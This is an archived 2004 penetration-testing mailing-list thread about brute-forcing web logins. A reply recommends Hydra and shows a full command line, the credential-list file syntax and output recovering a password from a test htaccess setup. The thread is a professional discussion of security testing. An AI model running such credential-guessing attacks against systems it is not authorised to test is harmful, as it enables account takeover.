Penetration Testing mailing list archives

RE: brute force tools

From: "Robert E. Lee" <robert () dyadsecurity com>
Date: Fri, 21 May 2004 08:50:15 -0700

Don,

I have had good luck with the 4.0 version of hydra.  It's not 100%
intuitive, but it does work somewhat reliably once you get used to it.

For this demo I made a file called passlist that had 5 lines
(username:a, :aa, usename:aaa, foo:aaaa, bar:aaaaa).  I set up a
htpasswd/htaccess pair that had username username and password a.

root:/var/tmp/hydra-4.0# hydra -l username -C ./passlist \
www.domain.com http /dir -s 80
Hydra v4.0 (c) 2004 by van Hauser / THC - use allowed only for legal
purposes.
Hydra (http://www.thc.org) starting at 2004-05-21 08:27:24
[DATA] 5 parallel tasks, 1 servers, 5 login tries (l:1/p:5), ~1 tries
per task
[DATA] attacking service www on port 80
[STATUS] attack finished for www.domain.com
[80][www] host: 333.333.333.333   login: username   password: a
Hydra (http://www.thc.org) finished at 2004-05-21 08:27:25

With the -C option you set up a file that has the following syntax:
Username:password

I believe you may be able to get away with:
:password

I didn't see a good permuting option from the command line, but I'm sure
you could whip sometime up to play with your dictionary file prior to
use by hydra.

Best of luck :).

Robert

-----Original Message-----
From: don.williams () verizonwireless com
[mailto:don.williams () verizonwireless com]
Sent: Thursday, May 20, 2004 4:34 PM
To: pen-test () securityfocus com
Subject: brute force tools



Frequently I attempt to brute force web applications and have found a
few problems with the programs I have used. For instance Brutus always
informs me a few successful attempts yet when I try they fail. (2)
Webcrack not reliable.



What I would like is some other tools you may have used with good
success and hopefully a perl based script which enumerate common words
substituting letters for numbers as users do everyday (ie. pa$$w0rd).
Also attempting the crack ColdFusion it only requests the password not
the user name / password combo as most tools only allow. Windows or
Linux is fine.



Thx

Current thread:

brute force tools don.williams (May 21)
- RE: brute force tools Tom (May 21)
- RE: brute force tools Robert E. Lee (May 21)
- Re: brute force tools Andrés Roldán (May 25)